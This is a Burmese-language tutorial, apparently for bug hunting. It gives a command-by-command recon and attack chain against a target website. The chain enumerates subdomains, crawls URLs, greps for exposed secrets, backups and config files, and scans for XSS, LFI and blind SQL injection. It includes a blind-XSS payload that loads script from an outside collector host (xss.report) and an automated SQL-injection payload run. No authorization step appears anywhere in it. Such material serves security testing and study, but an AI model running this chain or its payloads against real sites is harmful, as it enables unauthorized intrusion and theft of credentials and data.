ပထမဆုံး Target ၀က်ဆိုက်ရဲ့ sub Domain အခွဲတွေ ရှာပါမယ် ..subfinder Tool ကို သုံးပါမယ်
subfinder ကို install လုပ်ဖို့ terminal မှာ အောက်က ကွန်မန်း ရိုက် Y ပေးလိုက်ရင်ရပါပြီ
sudo apt install subfinder
ပြီးရင် subdomains ရှာ ဖို့ အောက်က ကွန်မန်း နဲ့ သွားလိုက်ပါ example.com နေရာမှာ မိမိ target ၀က်ဆိုက် အစားပြောင်းထည့်ပါ
subfinder -d example.com -all -recursive -o sub.txt
ဒိုမိန်းအခွဲ အားလုံး sub.txt ထည်းမှာ save ပေးပါလိမ့် မယ်
ပြီးရင် ရလာတဲ့ subdomain ေတွ ထည်းကနေ ဖွင့်လို့ ရတဲ့ ဆိုက် alive ြဖစ်တဲ့ subdomains ကိုပဲ httpx-toolkit သုံးပြီး ခွဲထုတ် ပစ်ပါမယ်..httpxtoolkit မရှိသေးရင် အောက်က ကွန်းမန်းသုံး install လိုက်ပါ
sudo apt install httpx-toolkit
ပြီးရင် အောက်က ကွန်မန်းနဲ့ alive ြဖစ်တဲ့ subdomain ေတွ ရွေးထုတ်လိုက်ပါ
cat sub.txt | httpx-toolkit -ports 80,443,8080,8000,8888 threads 200 > subdomains_alive.txt
ဆိုတော့ active ြဖစ်တဲ့ subdomain ေတွကို subdomains_alive.txt ဖိုင်အသစ်ထည်းမှာ သိမ်းပေးပါလိမ့်မယ်
နောက်တဆင့် အနေနဲ့ ရလာတဲံ့ ဆိုက် အားလုံး ကို တပြိုင်ထည်း katana နဲ့ စကန် လုပ်ချလိုက်ပါမယ်
katana tool ကို ဒီကနေ သွားကြည့်ပြီး install လိုက်ပါ ttps://github.com/projectdiscovery/katana
ပြီးရင် အောက်က ကွန်မန်းနဲ့ စကန်လိုက်ပါ
katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt
..အဲ့ဒီမှာ မလိုတဲ့ လင့်တွေ ဖယ်ထုတ်ပြီး အားနည်းချက်ရှာလို့ ရနိင်မဲ့ link ေတွ ကို allurls.txt ဖိုင်ထည်းမှာ ရွေးထုတ် ပေးပါလိမ့်မယ်
နောက်တဆင့် အနေနဲ့ ကျွန်တော်တို့ database password ေတွ api key ေတွ စသဖြင့် အသုံး၀င်မဲ့ အချက်အလက် တွေရှိနိင်မဲ့ လင့်တွေကို အောက်က ကွန်မန်းနဲ့ ထပ် ခွဲးထုတ်ပါမယ်
cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"
ပြီးရင် js လင့်တွေကို js.txt အဖြစ် သပ်သပ်စုထားပါမယ် ..အောက်က ကွန်မန်းနဲ့ သွားလိုက်ပါ
cat allurls.txt | grep -E "\.js$" >> js.txt
အဲဒီ js လင့်တွေကို nuclei နဲ့ စကန်လုပ်ချပါမယ် nuclei မရှိသေးရင် ဒီအောက်က ကွန်မန်းနဲ့ အင်စတဲ လိုက်ပါ
sudo apt install nuclei
ပြီးရင် အောက်က ကွန်မန်းနဲ့ စကန်လုပ်ပါ
cat js.txt | nuclei -t /home/kali/.local/nuclei-templates/http/exposures/ -c 30
နောက် တဆင့် အရေးကြီး အချက်အလက် Sensitive information တွေ ရှိနိင်မဲ့ directory တွေ ကို dirsearch tool နဲ့ ရှာပါမယ်
dirsearch -u http://example.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json
တွေ့ရှိတဲ့ dirctory ေတွ ကို တခုစီ ဖွင့် စစ်ကြည့်ပါ ..အားနည်းချက် ရှိတဲ့ အရေးကြီးတဲ့ ဖိုင်တွေ တွေ့ ရတတ်ပါတယ်
xss ပေါက်မပေါက် အောက်က ကွန်မန်းနဲ့ စစ်ကြည့်ပါ..nuclei priv8 template ဒီက ဒေါင်း နိင်ပါတယ် https://github.com/coffinsp/priv8-Nuclei
nuclei -list subdomains_alive.txt -t /home/kali/Priv8-Nuclei/xss
တိုင်၈ိုက်ဆိုက်တခုထည်းကို ရှာချင် အောက်က ကွန်မန်းသုံးပါ
subfinder -d example.com | httpx-toolkit -silent | katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters
lfi ပေါက်မပေါက် ရှာဖို့ အောက်က ကွန်မန်းသုံးပါ
cat allurls.txt | gf lfi | nuclei -tags lfi
blind sql injection ရှာဖို bsqli ကို အင်စတဲ ပါ ==> https://github.com/B1gN0Se/BSQLi
ပြီးရင် အောက်က အဆင့် တွေအတိုင်း သွားပါ
paramspider -l subdomains_alive.txt
cd results
cat နဲ့ ဖိုင်အားလုံးကို urls.txt တဖိုင်ထည်းစုလိုက်ပါ
ဥပမာ
cat sub1.txt sub2.txt subd3.txt > urls.txt
ပြီရင်
cat urls.txt | sed 's/FUZZ//g' >final.txt
final.txt ကို BSQLi folder ထည်း move လိုက်ပါ
mv final.txt /home/kali/BSQLi
cd ..
cd BSQLi
python lostsec.py -l final.txt -p payloads/xor.txt -t 5
blind sql injection ပေါက်မပေါက် အော်တို ရှာပေးပါလိမ့်မယ်